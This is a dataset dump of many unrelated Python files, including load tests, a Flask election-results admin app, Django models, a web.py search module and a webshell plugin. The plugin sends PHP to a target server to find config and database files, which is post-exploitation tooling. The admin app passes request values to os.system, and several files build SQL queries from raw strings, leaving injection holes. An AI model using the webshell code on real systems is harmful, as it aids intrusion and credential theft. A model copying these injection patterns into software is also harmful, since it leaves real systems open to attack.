text stringlengths 8 6.05M |
|---|
import logging
from locust import TaskSet, task
logger = logging.getLogger(__name__)
class UserBehavior(TaskSet):
"""This class inheried from the `TaskSet`
to run the a specific task in hand.
-- ChangeLog:
Sunday 27 May 2018 08:10:32 AM IST
@jawahar273 [Version 0.1]
-1- Init Code
"""
def __init__(self, parent):
super().__init__(parent=parent)
self.token_key = "Token "
def base_url(self):
"""This method will be use the return
the base url in the server
-- ChangeLog:
Sunday 27 May 2018 08:11:43 AM IST
@jawahar273 [Version 0.1]
-1- Init Code
"""
return "/api/"
def packages_url(self):
"""This method will be use the return
url related to the package app.
-- ChangeLog:
Sunday 27 May 2018 08:12:22 AM IST
@jawahar273 [Version 0.1]
-1- Init Code
"""
return self.base_url() + "package/"
def user_details(self):
"""This method will be use the return
the load testing username and password.
-- ChangeLog:
Sunday 27 May 2018 08:12:57 AM IST
@jawahar273 [Version 0.1]
-1- Init Code
"""
return {"username": "demo", "password": "demobmmb"}
def on_start(self):
""" on_start is called
when a Locust start before
any task is scheduled
-- ChangeLog:
Sunday 27 May 2018 08:13:28 AM IST
@jawahar273 [Version 0.1]
-1- Init Code
"""
self.login()
def login(self):
"""This method running after the `on_start`
-- ChangeLog:
Sunday 27 May 2018 08:14:15 AM IST
@jawahar273 [Version 0.1]
-1- Init Code
"""
logger.info("login user")
response = self.client.post(
self.base_url() + "rest-auth/login/", data=self.user_details()
)
self.token_key = self.token_key + response.text
logger.debug("response from host" + str(response))
print("Response status code:", response.status_code)
print("Response content:", response.text)
@task(1)
def currency_details(self):
"""This method will call the currency details
api and return the response status code.
-- ChangeLog:
Sunday 27 May 2018 08:14:39 AM IST
@jawahar273 [Version 0.1]
-1- Init Code
"""
currency = self.client.get(
self.packages_url() + "currency/",
headers={"authentication": self.token_key},
)
if currency.status_code >= 300:
logger.debug("response from host for currency {}".format(currency.text))
else:
logger.info("success in currency: {}".format(currency.status_code))
|
import calendar
age = int(input('ENTER YOUR AGE: \n'))
date = int(input('ENTER DATE OF BIRTHDAY IN FIGURES: \n'))
month = int(input('ENTER MONTH OF BIRTH IN FIGURES: \n'))
current_year = int(input('ENTER CURRENT YEAR: \n'))
year_of_birth = current_year - age
day_of_birth = calendar.weekday(year_of_birth, month, date)
date_of_birth = date
month_of_birth = month
day_string = calendar.day_name[day_of_birth]
print('you were born on ' + day_string + ',' + str(date_of_birth) + ',' + str(month_of_birth) + ',' + str(year_of_birth))
|
import web
import re
def unique(seq):
keys = {}
for e in seq:
keys[e] = 1
return keys.keys()
def unique2(seqx):
modlist=[ r.split(";") for r in seq if r != '']
mods=[ i for s in modlist for i in s ] # flatten
return unique(mods)
db = web.database(dbn='sqlite', db='modules.db')
def regexp(expr, item):
return int(re.search(expr, item, re.IGNORECASE) is not None)
def install_regexp():
db._getctx().db.create_function('REGEXP', 2, regexp)
def where_clause(fields, key, words=True):
if '%' in key:
key = (web.websafe(key),) * len(fields)
clause = "%s LIKE '%s'"
where = " OR ".join([ clause %(f,k) for f,k in zip(fields, key)])
else:
if words:
install_regexp()
clause="%s REGEXP '\\b%s\\b'"
else:
clause="%s = '%s'"
key = (web.websafe(key),) * len(fields)
where=" OR ".join([ clause % (f,k) for f, k in zip(fields, key)])
return "(" + where + ")"
def multi_search(field, fields, keys, combine, words):
keys=keys.replace("*", "%").split()
if field=='any':
field=fields
where=combine.join(where_clause(field, key, words=words) for key in keys)
return where
def search_for_species(field, keys, limit=None, offset=None,
words=True, count=False, combine=" OR "):
where=multi_search(field, ('id', 'name', 'sciname'), keys,
combine, words=words)
if count:
what="count(*) as count"
limit=None
offset=None
else:
what="*"
res=db.select('species', what=what, where=where,
limit=limit, offset=offset)
return list(res)
def get_modules_for_species(spec, which='3'):
if which=='1':
where="id NOT LIKE 'p%' AND "
elif which=='2':
where="id LIKE 'p%' AND "
else:
where=""
def get_mod(s):
res=db.select('module', what="id",
where=where + ("species LIKE '%%%s%%'" % s))
return ";".join([str(r.id) for r in res])
return [get_mod(s) for s in spec]
def get_modules_for_tissues(tiss, which='3'):
if which=='1':
where="id NOT LIKE 'p%%' AND tissues LIKE '%%%s%%'"
elif which=='2':
where="id LIKE 'p%%' AND tissues LIKE '%%%s%%'"
else:
where="tissues LIKE '%%%s%%'"
def get_mod(s):
res=db.select('module', what="id", where=where % s)
return ";".join([str(r.id) for r in res])
return [get_mod(s) for s in tiss]
def search_for_tissue(field, keys, limit=None, offset=None,
words=True, count=False, combine=" OR "):
where=multi_search(field, ('id', 'name'), keys, combine, words=words)
if count:
what="count(*) as count"
limit=None
offset=None
else:
what="*"
res=db.select('tissue', what=what, where=where,
limit=limit, offset=offset)
return list(res)
def search_for_gene(field, keys, limit=None, offset=None, words=True,
count=False, combine=" OR "):
where=multi_search(field, ('ensembl', 'entrez', 'symbol', 'name'), keys,
combine, words=words)
if count:
what="count(*) as count"
limit=None
offset=None
order=None
else:
what="*"
order="symbol"
res=db.select('gene', what=what, where=where,
limit=limit, offset=offset, order=order)
return list(res)
def search_for_enrichment(field, keys, limit=None, offset=None,
words=True, count=False, combine=" OR "):
where=multi_search(field, ('id', 'name'), keys, combine, words=words)
if count:
what="count(*) as count"
limit=None
offset=None
order=None
else:
what="*"
order="name"
res=db.select('category', what=what, where=where,
limit=limit, offset=offset, order=order)
return list(res)
def get_module_types():
return db.select('module_type')
def get_modules(mods):
res=db.select('module', where='id in (' +
",".join(["'%s'" % str(m) for m in mods]) + ')')
return list(res)
def get_module(m):
return db.select('module', where="id='%s'" % m)
def get_enrichment(c):
return db.select('enrichment', where="category='%s'" % c)
def modules_for_species(field, keys, mods, which, words=True, combine=" OR "):
where=multi_search(field, ('id', 'name', 'sciname'), keys, combine,
words=words)
spec=[s.id for s in db.select('species', what='id', where=where)]
spec=unique(spec)
if len(spec)==0:
return mods
where=" OR ".join("species LIKE '%%%s%%'" % s for s in spec)
if which=='1':
where="id NOT LIKE 'p%' AND (" + where + ")"
elif which=='2':
where="id LIKE 'p%' AND (" + where + ")"
specmods=db.select('module', what='id,species', where=where)
for rec in specmods:
m=str(rec.id)
for s in rec.species.split(";"):
s2=s.split(":")[1]
if s2 in spec:
if m in mods:
mods[m]=mods[m] + '; <span class="s">%s</span>' % s2
else:
mods[m]='<span class="s">%s</span>' % s2
return mods
def modules_for_tissue(field, keys, mods, which, words=True, combine=" OR "):
where=multi_search(field, ('id', 'name'), keys, combine, words=words)
tiss=[t.id for t in db.select('tissue', what='id', where=where)]
tiss=unique(tiss)
if len(tiss)==0:
return mods
where=" OR ".join("tissues LIKE '%%%s%%'" % t for t in tiss)
if which=='1':
where="id NOT LIKE 'p%' AND (" + where + ")"
elif which=='2':
where="id LIKE 'p%' AND (" + where + ")"
tissmods=db.select('module', what='id,tissues', where=where)
for rec in tissmods:
m=str(rec.id)
for t in rec.tissues.split(";"):
t2=t.split(":")[1]
if t2 in tiss:
if m in mods:
mods[m]=mods[m] + '; <span class="t">%s</span>' % t2
else:
mods[m]='<span class="t">%s</span>' % t2
return mods
def modules_for_gene(field, keys, mods, which, words=True, combine=" OR "):
where=multi_search(field, ("ensembl", "entrez", "symbol", "name"),
keys, combine, words=words)
genes=db.select("gene", what='modules,symbol', where=where)
for rec in genes:
if rec.modules=='':
continue;
for m in rec.modules.split(";"):
if (which=='1' and m[0]=='p') or (which=='2' and m[0]!='p'):
continue
s=rec.symbol.replace(";", ", ")
if m in mods:
mods[m]=mods[m] + '; <span class="g">%s</span>' % s
else:
mods[m]='<span class="g">%s</span>' % s
return mods
def modules_for_enrichment(field, keys, mods, which, words=True,
combine=" OR "):
where=multi_search(field, ('id', 'name'), keys, combine, words=words)
cats=db.select('category', what="modules,name", where=where)
for rec in cats:
if rec.modules=='':
continue;
for m in rec.modules.split(";"):
if (which=='1' and m[0]=='p') or (which=='2' and m[0]!='p'):
continue
n=rec.name
if m in mods:
mods[m]=mods[m] + '; <span class="e">%s</span>' % n
else:
mods[m]='<span class="e">%s</span>' % n
return mods
|
# Usage: python app.py
from PIL import Image
from io import BytesIO
from flask import Flask, request, jsonify
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
import numpy as np
import os
model_path = 'model/5_model_akurasi_93_91_93.h5'
model = load_model(model_path)
def predict(file):
img = Image.open(BytesIO(file))
img = img.resize((160, 160), Image.ANTIALIAS)
img = img_to_array(img)
img = np.expand_dims(img, axis=0)
result = model.predict(img)
y_pred = np.argmax(result, axis=1)
return y_pred
app = Flask(__name__)
@app.route("/")
def hello():
return "Machine Learning Prediction Endpoint"
@app.route('/predict', methods=['POST'])
def upload_file():
if request.method == 'POST':
file = request.files['file'].read()
result = predict(file)
if result == 0:
label = "Aglaonema"
elif result == 1:
label = "Janda Bolong"
elif result == 2:
label = "Kuping Gajah"
elif result == 3:
label = "Lidah Mertua"
elif result == 4:
label = "Sirih Gading"
elif result == 5:
label = "Tanaman Lipstik Gantung"
elif result == 6:
label = "Tanaman Suplir"
else:
label = "Data not found"
return jsonify(result=label)
if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0', port=int(os.environ.get("PORT", 8080)))
|
#!/usr/bin/python
from copy import deepcopy
class MaxHeap:
def __init__(self, arr=list()):
self.arr = deepcopy(arr)
if len(self.arr) == 0 or self.arr[0] is not None:
self.arr = [None] + self.arr
def insert(self, v):
self.arr.append(v)
self.swim(len(self.arr)-1)
def del_max(self):
v_max = self.arr[1]
self._exchange(1, len(self.arr)-1)
self.arr.pop()
self.sink(1)
return v_max
def is_empty(self):
pass
def swim(self, k):
while k > 1 and self.arr[k] > self.arr[k/2]:
self._exchange(k, k/2)
k = k/2
def sink(self, k):
while 2*k < len(self.arr):
j = 2*k
if 2*k+1 < len(self.arr) and self.arr[2*k] < self.arr[2*k+1]:
j = 2*k+1
if self.arr[j] <= self.arr[k]:
break
self._exchange(k, j)
k = j
def _exchange(self, k1, k2):
_hold = deepcopy(self.arr[k1])
self.arr[k1] = self.arr[k2]
self.arr[k2] = _hold
def check_max_heap(self):
size = len(self.arr)
for k in xrange(1, size):
k_l = False if (2*k) < size and self.arr[2*k] > self.arr[k] else True
k_r = False if (2*k+1) < size and self.arr[2*k+1] > self.arr[k] else True
if not (k_l and k_r):
return False
return True
if __name__ == "__main__":
a = [30, 27, 23, 17, 16, 15, 13, 14, 18, 11]
b = []
x = MaxHeap()
# r = x.del_max()
# print str(r) + " is deleted"
# print x.arr
# res = x.check_max_heap()
#
# # print res
# for i in range(10, 0, -1):
# print i |
from .CreateCeedlingModule import *
from .OpenCeedlingFile import *
__all__ = ["CreateCeedlingModuleCommand", "OpenCeedlingFileCommand"]
|
from contextlib import contextmanager
from typing import Callable, Iterator, List, TYPE_CHECKING
if TYPE_CHECKING: # prevent circular imports for type checking
from simulation.state import State # noqa
ValidatorMethod = Callable[['State'], None]
class ValidationError(Exception):
"""
An error type raised when a simulation validation condition is violated.
This also provides the ability to report the context of a validation
error... that is, to report the specific step causing the validation error.
"""
def __init__(self, msg: str):
super().__init__(msg)
self._ctx: List['str'] = []
def push_context(self, ctx: str) -> None:
"""
Push a new execution context onto the exception.
The context is an arbitrary string meant to provide users a hint as to
the cause of an error even when plugins are allowed to make arbitrary
changes to the system state.
"""
self._ctx.append(ctx)
def __str__(self) -> str:
msg = super().__str__()
for ctx in self._ctx:
msg = f'After execution of "{ctx}": ' + msg
return msg
@contextmanager
def context(name: str) -> Iterator[None]:
"""Create a new "validation context".
This returns a context manager. Any validation error thrown within this context
will contain a reference to the value provided.
"""
try:
yield
except ValidationError as e:
e.push_context(name)
raise
except Exception:
# TODO: use simulation logger
print(f'ERROR: Unhandled exception raised while executing "{name}"')
raise
|
import matplotlib.pyplot as plt
import numpy.random as npr
import cPickle as pickle
import os
import seaborn as sns
sns.set_style("white")
current_palette = sns.color_palette()
npr.seed(42)
exp_types = ["random", "flux", "redshift"]
out_dir = "/Users/acm/Dropbox/Proj/astro/DESIMCMC/tex/quasar_z/NIPS2015/"
for exp_type in exp_types:
# load MOG
mog_exp_file = "../analysis_mog/%s/results.pkl"%exp_type
with open(mog_exp_file, 'rb') as handle:
mog_dict = pickle.load(handle)
mog_specs = mog_dict['spec_ids']
mog_preds = mog_dict['preds']
mog_true = mog_dict['z_true']
mog_per = mog_dict['preds_per']
fig = plt.figure(figsize=(8, 8))
max_z = max(mog_preds.max(), mog_true.max())
min_z = min(mog_true.min() - .2, 2.2)
plt.plot([min_z, max_z], [min_z, max_z], linewidth=2, alpha=.5)
plt_idx = np.arange(0, len(mog_true), 8)
for n in plt_idx:
plt.plot([mog_true[n], mog_true[n]], [mog_per[n,0], mog_per[n,-1]],
alpha = .15, color = 'grey', linewidth=1)
plt.scatter(mog_true[plt_idx], mog_preds[plt_idx], color=current_palette[2], alpha = 1.0)
plt.xlim(min_z, max_z)
plt.ylim(min_z, max_z)
plt.xlabel("$z_{spec}$", fontsize=40, labelpad=20)
plt.ylabel("$z_{photo}$", fontsize=40, rotation='horizontal', labelpad=40)
if exp_type != 'random':
plt.ylabel("")
plt.tick_params(axis='both', which='major', labelsize=20)
#plt.title("Posterior expectation model predictions", fontsize=14)
plt.savefig(os.path.join(out_dir, "scatter_exp-%s.pdf"%exp_type), bbox_inches='tight')
# z_pred = np.zeros(len(qso_sample_files))
# z_pred_mode = np.zeros(len(qso_sample_files))
# z_lo = np.zeros(len(z_pred))
# z_hi = np.zeros(len(z_pred))
# z_true = np.zeros(len(z_pred))
# z_lo0 = np.zeros(len(z_pred))
# z_hi0 = np.zeros(len(z_pred))
# q_inds = np.zeros(len(z_pred))
# mode_sample = np.zeros(len(z_pred), dtype=np.int)
# expected_m = np.zeros(len(z_pred))
# expected_w = np.zeros((len(z_pred), 4))
# for i, qso_samp_file in enumerate(qso_sample_files):
# if i%25==0: print "%d of %d"%(i, len(qso_sample_files))
# try:
# th_samps, lls, q_idx, qso_info, chain_idx = load_redshift_samples(qso_samp_file)
# except:
# print "skipping %d"%i
# continue
# q_inds[i] = q_idx
#
# Nsamps = th_samps.shape[0]
# # compare predict to true
# z_true[i] = qso_info['Z_VI']
# z_pred[i] = th_samps[Nsamps/2:, 0].mean()
# z_lo[i], z_hi[i] = np.percentile(th_samps[Nsamps/2:, 0], [.5, 99.5])
# z_lo0[i], z_hi0[i] = np.percentile(th_samps[Nsamps/2:, 0], [5, 95])
#
# # kernel density estimate to find the highest mode
# z_unique = np.unique(th_samps[Nsamps/2:, 0])
# density = kde.gaussian_kde(z_unique, bw_method = .08 ) #'silverman')
# mode_sample[i] = density(z_unique).argmax()
# z_pred_mode[i] = z_unique[ mode_sample[i] ]
#
# # expected magnitude/
# expected_m[i] = np.exp(th_samps[Nsamps/2:, -1]).mean()
#
# # expected weights
# ws = np.exp(th_samps[Nsamps/2:, 1:-1])
# ws /= np.sum(ws, axis=1, keepdims=True)
# expected_w[i, :] = ws.mean(axis=0)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ˅
from abc import *
# ˄
class Element(object, metaclass=ABCMeta):
# ˅
# ˄
@abstractmethod
def accept(self, visitor):
# ˅
pass
# ˄
# ˅
# ˄
# ˅
# ˄
|
import urllib
from BeautifulSoup import*
url=raw_input('Enter url:')
html=urllib.urlopen(url).read()
soup=BeautifulSoup(html)
tags=soup('a')
for tag in tags:
print 'TAG:',tag
print 'URL:',tag.get('href',None)
print 'Content:',tag.contents[0]
print 'Attrs:',tag.attrs |
#!/usr/bin/env python
import argparse
import csv
import glob
import json
import io
import os
import re
try:
set
except NameError:
from sets import Set as set
import datetime
from csvkit import py2
from flask import Flask, render_template, request, make_response, Response
import peewee
from peewee import *
from playhouse.postgres_ext import *
import models
import utils
app = Flask(__name__)
app.debug=True
@app.route('/elections/<raceyear>/admin/<racedate>/archive/')
def archive_list(racedate, raceyear):
racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
)
models.database_proxy.initialize(racedate_db)
context = utils.build_context(racedate, raceyear)
context['files'] = sorted(
[
{
"name": f.split('/')[-1],
"date": datetime.datetime.fromtimestamp(float(f.split('/')[-1].split('-')[-1].split('.json')[0]))
}
for f in glob.glob('/tmp/%s/*.json' % racedate)
],
key=lambda x:x,
reverse=True
)[:750]
context['states'] = []
state_list = sorted(list(set([race.statepostal for race in models.ElexRace.select()])), key=lambda x: x)
for state in state_list:
race = models.ElexRace.select().where(models.ElexRace.statepostal == state)[0]
state_dict = {}
state_dict['statepostal'] = state
state_dict['report'] = None
state_dict['report_description'] = None
context['states'].append(state_dict)
return render_template('archive_list.html', **context)
@app.route('/elections/<raceyear>/admin/<racedate>/archive/<filename>')
def archive_detail(racedate, filename, raceyear):
with open('/tmp/%s/%s' % (racedate, filename), 'r') as readfile:
return readfile.read()
@app.route('/elections/<raceyear>/admin/<racedate>/')
def race_list(racedate, raceyear):
context = utils.build_context(racedate, raceyear)
context['races'] = []
context['states'] = []
try:
racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
)
models.database_proxy.initialize(racedate_db)
context['races'] = [r for r in models.ElexResult.raw("""select officename, seatname, race_unique_id, raceid, statepostal, accept_ap_calls from elex_results group by officename, seatname, race_unique_id, raceid, statepostal, accept_ap_calls""")]
state_list = sorted(list(set([race.statepostal for race in models.ElexRace.select()])), key=lambda x: x)
for state in state_list:
race = models.OverrideRace.select().where(models.OverrideRace.statepostal == state)[0]
state_dict = {}
state_dict['statepostal'] = state
state_dict['report'] = race.report
context['states'].append(state_dict)
return render_template('race_list.html', **context)
except peewee.OperationalError as e:
context['error'] = e
return render_template('error.html', **context)
except peewee.ProgrammingError as e:
context['error'] = e
return render_template('error.html', **context)
@app.route('/elections/<raceyear>/admin/<racedate>/script/<script_type>/', methods=['GET'])
def scripts(racedate, script_type, raceyear):
base_command = '. /home/ubuntu/.virtualenvs/loaderpypy/bin/activate && cd /home/ubuntu/elex-loader/ && '
if request.method == 'GET':
o = "1"
if script_type == 'bake':
pass
else:
o = os.system('%s./scripts/prd/%s.sh %s' % (base_command, script_type, racedate))
return json.dumps({"message": "success", "output": o})
@app.route('/elections/<raceyear>/admin/<racedate>/csv/', methods=['POST'])
def overrides_post(racedate, raceyear):
if request.method == 'POST':
payload = dict(request.form)
candidates_text = None
races_text = None
if payload.get('candidates_text', None):
candidates_text = str(payload['candidates_text'][0])
if payload.get('races_text', None):
races_text = str(payload['races_text'][0])
if races_text:
with open('../elex-loader/overrides/%s_override_races.csv' % racedate, 'w') as writefile:
writefile.write(races_text)
if candidates_text:
with open('../elex-loader/overrides/%s_override_candidates.csv' % racedate, 'w') as writefile:
writefile.write(candidates_text)
return json.dumps({"message": "success"})
@app.route('/elections/<raceyear>/admin/<racedate>/csv/<override>/', methods=['GET'])
def overrides_csv(racedate, override, raceyear):
racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
)
models.database_proxy.initialize(racedate_db)
if request.method == 'GET':
output = ''
if override == 'race':
objs = [r.serialize() for r in models.OverrideRace.select()]
if override == 'candidate':
objs = [r.serialize() for r in models.OverrideCandidate.select()]
output = io.BytesIO()
fieldnames = [unicode(k) for k in objs[0].keys()]
writer = py2.CSVKitDictWriter(output, fieldnames=list(fieldnames))
writer.writeheader()
writer.writerows(objs)
output = make_response(output.getvalue())
output.headers["Content-Disposition"] = "attachment; filename=override_%ss.csv" % override
output.headers["Content-type"] = "text/csv"
return output
@app.route('/elections/<raceyear>/admin/<racedate>/state/<statepostal>/', methods=['POST'])
def state_detail(racedate, statepostal, raceyear):
racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
)
models.database_proxy.initialize(racedate_db)
if request.method == 'POST':
payload = utils.clean_payload(dict(request.form))
races = [r.race_unique_id for r in models.ElexRace.select().where(models.ElexRace.statepostal == statepostal)]
for r in races:
o = models.OverrideRace.get(models.OverrideRace.race_unique_id==r)
o.report=payload['report']
o.save()
utils.update_views(models.database_proxy)
return json.dumps({"message": "success"})
@app.route('/elections/<raceyear>/admin/<racedate>/race/<raceid>/', methods=['GET', 'POST'])
def race_detail(racedate, raceid, raceyear):
if request.method == 'GET':
try:
racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
)
models.database_proxy.initialize(racedate_db)
context = utils.build_context(racedate, raceyear)
context['race'] = [r for r in models.ElexResult.raw("""select officename, seatname, race_unique_id, raceid, statepostal, accept_ap_calls from elex_results where race_unique_id = '%s' group by officename, seatname, race_unique_id, raceid, statepostal, accept_ap_calls""" % raceid)][0]
context['candidates'] = models.ElexResult.raw("""select nyt_runoff, party, nyt_winner, candidate_unique_id, first, last from elex_results where race_unique_id = '%s' group by nyt_runoff, party, nyt_winner, candidate_unique_id, first, last order by last, first DESC;""" % raceid)
context['ap_winner'] = None
ap_winner = [m for m in models.ElexResult.raw("""select candidate_unique_id, first, last, winner, nyt_winner, nyt_called from elex_results where race_unique_id = '%s' and winner = 'true' group by candidate_unique_id, first, last, winner, nyt_winner, nyt_called order by last, first DESC;""" % raceid)]
if len(ap_winner) > 0:
context['ap_winner'] = ap_winner[0]
context['states'] = []
state_list = sorted(list(set([race.statepostal for race in models.ElexRace.select()])), key=lambda x: x)
for state in state_list:
race = models.ElexRace.select().where(models.ElexRace.statepostal == state)[0]
state_dict = {}
state_dict['statepostal'] = state
state_dict['report'] = None
state_dict['report_description'] = None
context['states'].append(state_dict)
return render_template('race_detail.html', **context)
except peewee.OperationalError as e:
context['error'] = e
return render_template('error.html', **context)
if request.method == 'POST':
racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
)
models.database_proxy.initialize(racedate_db)
payload = utils.clean_payload(dict(request.form))
try:
r = models.OverrideRace.get(models.OverrideRace.race_unique_id==raceid)
except models.OverrideRace.DoesNotExist:
r = models.OverrideRace.create(
race_unique_id=raceid,
raceid=raceid.split('-')[1],
statepostal=raceid.split('-')[0])
# nyt_winner is a single ID, there can only be one winner.
utils.set_winner(payload['nyt_winner'], raceid)
print(payload)
# nyt_runoff is a list of ids, there can be 2 or more advancing.
runoff_cands = []
if payload.get('nyt_runoff', None):
runoff_cands = [x.strip() for x in payload['nyt_runoff'].split(',')]
utils.set_runoff(runoff_cands, raceid)
utils.update_model(r, payload)
utils.update_views(models.database_proxy)
return json.dumps({"message": "success"})
@app.route('/elections/<raceyear>/admin/<racedate>/candidate/<candidateid>/', methods=['POST'])
def candidate_detail(racedate, candidateid, raceyear):
racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
)
models.database_proxy.initialize(racedate_db)
if request.method == 'POST':
payload = utils.clean_payload(dict(request.form))
try:
oc = models.OverrideCandidate.get(models.OverrideCandidate.candidate_unique_id == candidateid)
except models.OverrideCandidate.DoesNotExist:
oc = models.OverrideCandidate.create(candidate_unique_id=candidateid)
utils.update_model(oc, payload)
utils.update_views(models.database_proxy)
return json.dumps({"message": "success"})
@app.route('/elections/<raceyear>/admin/<racedate>/loader/timeout/', methods=['POST'])
def set_loader_timeout(racedate, raceyear):
if request.method == 'POST':
payload = utils.clean_payload(dict(request.form))
timeout = payload.get('timeout', '')
os.system('echo export ELEX_LOADER_TIMEOUT=%s > /tmp/elex_loader_timeout.sh' % timeout)
return json.dumps({"message": "success", "output": "0"})
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--port')
args = parser.parse_args()
server_port = 8001
if args.port:
server_port = int(args.port)
app.run(host='0.0.0.0', port=server_port, debug=True)
|
import os
from django.db import models
from django.conf import settings
from django.utils import timezone
from django.utils.translation import gettext as _
from django.conf import settings
from django.dispatch import receiver
from django.db.models.signals import post_save
class Profile(models.Model):
# Wrap the User object within a Profile, gives name and email.
user = models.OneToOneField(settings.AUTH_USER_MODEL, related_name='profile', on_delete=models.CASCADE,primary_key=True)
signup_date = models.DateField(verbose_name="User signup date")
profile_photo = models.ImageField(verbose_name="Profile picure", upload_to='profile_photos/', null=True)
bio = models.CharField(verbose_name="User Bio", max_length=200, null=True)
height = models.PositiveSmallIntegerField(verbose_name="Height in inches", null=True) # Doesn't allow for fractional height, integers only
weight = models.PositiveSmallIntegerField(verbose_name="Weight in pounds", null=True)
points = models.PositiveIntegerField(verbose_name="Total accumulated points", default=0)
friends = models.ManyToManyField("self", symmetrical=True, verbose_name="Friend list", null=True)
def __str__(self):
return self.user.first_name + " " + self.user.last_name + "(" + str(self.pk) + "): " + str(self.points) + " accumulated points"
# Get the profile photo path for the user
# Returns just a placeholder if not set, otherwise returns the actual photo
# The heroku filesystem is ephemerakl, so photos get deleted over time.
def photo_or_placeholder(self):
if self.profile_photo and hasattr(self.profile_photo, 'url'):
return self.profile_photo.url
return settings.STATIC_URL + 'profile_placeholder.jpg'
# Get the human-readable height for a user.
# Returns a tuple of (feet, inches) which is (0,0) on invalid input
@property
def readable_height(self):
# Integer divide by 12 to get feet, remainder is inches
if not self.height or self.height <= 0:
return (0,0)
ft = self.height // 12
inches = self.height % 12
return (ft, inches)
class Meta:
ordering = ['-points']
# Allauth fires a post_save signal when a new user signs up.
# We can catch this signal and create a sensible default profile and initialize the one-to-one relationship.
# Citation: http://www.marinamele.com/taskbuster-django-tutorial/model-creation-onetoone-relationship-signals-django-admin
@receiver(post_save, sender = settings.AUTH_USER_MODEL)
def create_profile(sender, created, instance, **kwargs):
# The signal fires multiple times, so we need to make sure that this one is the actual creator of the user profile.
if created:
new_profile = Profile(user = instance, bio="Placeholder bio", signup_date=timezone.now())
new_profile.save()
### NOT CURRENTLY BEING USED (REFER INSTEAD TO dashboard/models.py) - DO NOT DELETE, CONTAINS USEFUL CODE ###
#class Exercise(models.Model):
# # Create an Exercise model that can store the basic information about exercises that a user would complete
# # Each Profile would then have an associated list of exercise objects, each instance referring to the date the exercise was recorded
# # Workout dropdown categories for the type of exercise, body part exercised, and workout intensity conducted
# TYPES_OF_EXERCISE = (
# (1, _('Balance')),
# (2, _('Cardio')),
# (3, _('Flexibility')),
# (4, _('Strength')),
# (5, _('Other')),
# )
# TYPES_OF_BODY_PARTS = (
# (1, _('Abdominals')),
# (2, _('Arms')),
# (3, _('Back')),
# (4, _('Chest')),
# (5, _('Legs')),
# (6, _('Shoulders')),
# (7, _('Other')),
# )
# INTENSITY = (
# (1, _('Low')),
# (2, _('Moderate')),
# (3, _('Vigorous')),
# )
# # Exercise fields
# entry_date = models.DateTimeField(verbose_name="Date and Time of Workout")
# exercise_type = models.CharField(max_length=15, choices=TYPES_OF_EXERCISE, default=1,)
# body_part_exercised = models.CharField(max_length=15, choices=TYPES_OF_BODY_PARTS, default=1,)
# exercise_intensity = models.CharField(max_length=15, choices=INTENSITY, default=1,)
# time = models.PositiveSmallIntegerField(verbose_name="Length of Workout (in minutes)", null=True)
# journal = models.CharField(verbose_name="Post-Workout Thoughts", max_length=200, null=True)
# points_earned = models.PositiveIntegerField(verbose_name="Points from Workout", default=5)
#
# def __str__(self):
# return "Earned " + str(self.points_earned) + " with a workout on " + self.entry_date + ", focused on " + self.body_part_exercised + " with " + self.exercise_type + " exercises for " + str(self.time) + " minutes"
#####################################
# RUNNING LIST OF SOURCES
# Source for Exercise Model: https://www.merixstudio.com/blog/django-models-declaring-list-available-choices-right-way/
# Source for Types of Exercise: https://www.bupa.co.uk/health-information/exercise-fitness/types-of-exercise
# Muscle Group Workout Information: https://www.medicalnewstoday.com/articles/muscle-groups-to-work-out-together#which-muscle-groups-to-pair
# DateTime Field: https://www.geeksforgeeks.org/datetimefield-django-models/
# Intensity Scale: https://en.wikipedia.org/wiki/Exercise_intensity
# Model Format: https://docs.djangoproject.com/en/3.1/intro/tutorial02/
######################################
|
from libs.config import alias, gget
from libs.myapp import send, color, print_tree
from json import JSONDecodeError
def get_php(file_path: str):
return """$cfgs=array("cfg","config","db","database");
function filter($v,$vv){
return strstr($v, $vv);
}
function scan_rescursive($directory) {
global $cfgs;
$res = array();
foreach(glob("$directory/*") as $item) {
if(is_dir($item)) {
$items=explode('/', $item);
$folder = base64_encode(end($items));
$res[$folder] = scan_rescursive($item);
continue;
}
else if (count(array_filter(array_map("filter", array_fill(0, count($cfgs), $item), $cfgs)))){
$res[] = base64_encode(basename($item));
}
}
return $res;
}
print(json_encode(scan_rescursive("%s")));""" % file_path
@alias(True, _type="DETECT", fp="web_file_path")
def run(web_file_path: str = ""):
"""
fc
Search config file from target system.
eg: fc {web_file_path=webroot}
"""
web_file_path = web_file_path if (len(web_file_path)) else gget("webshell.root", "webshell")
php = get_php(web_file_path)
try:
res = send(php)
if (not res):
return
file_tree = res.r_json()
except JSONDecodeError:
print(color.red("Parse Error"))
return
print_tree(web_file_path, file_tree)
|
class Solution(object):
def flatten(self, root):
def _flatten(root):
if root is None:
return
left_tail = _flatten(root.left)
right_tail = _flatten(root.right)
if left_tail is not None:
left_tail.right = root.right
root.right = root.left
root.left = None
if right_tail is None:
if left_tail is None: # Both left and right are None
return root
else:
return left_tail
return right_tail
_flatten(root)
|
from xml.etree import ElementTree
import adsk.core
import adsk.fusion
import traceback
# Reads XML data from attribute returns element tree root element
